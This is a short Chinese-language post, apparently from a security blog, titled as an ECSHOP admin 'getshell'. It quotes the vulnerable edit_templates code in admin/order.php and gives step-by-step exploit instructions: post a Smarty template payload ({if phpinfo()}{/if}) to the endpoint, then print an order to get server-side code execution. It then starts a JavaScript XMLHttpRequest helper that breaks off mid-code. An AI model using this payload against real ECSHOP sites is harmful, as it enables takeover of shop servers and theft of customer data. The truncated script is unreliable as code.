ECSHOP 后台getshell

admin/order.php [php] elseif ($_REQUEST['act'] == 'edit_templates') { /* 更新模板文件的内容 */ $file_name = @fopen('../' . DATA_DIR . '/order_print.html', 'w+'); //写出模板,,只要有一个调用模板就可以getshell了 echo '../' . DATA_DIR . '/order_print.html'; echo stripslashes($_POST['FCKeditor1']); @fwrite($file_name, stripslashes($_POST['FCKeditor1'])); @fclose($file_name); /* 提示信息 */ $link[] = array('text' => $_LANG['back_list'], 'href'=>'order.php?act=list'); sys_msg($_LANG['edit_template_success'], 0, $link); } elseif ($_REQUEST['act'] == 'info') { 省略若干 assign_query_info(); $smarty->display('order_info.htm'); } } [/php] 我们只要先提交 127.0.0.1/ec/admin/order.php?act=edit_templates POST 内容 FCKeditor1={if phpinfo()}{/if} 然后随便查看一个订单 点击打印 就可以getshell了 ecshop1 ecshop2 附带一个javascript的脚本 [php] var request = false; if(window.XMLHttpRequest) { request = new XMLHttpRequest(); if(request.overrideMimeType) { request.overrideMimeType('text/xml'); } } else if(window.ActiveXObject) { var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP']; for(var i=0; i

发表评论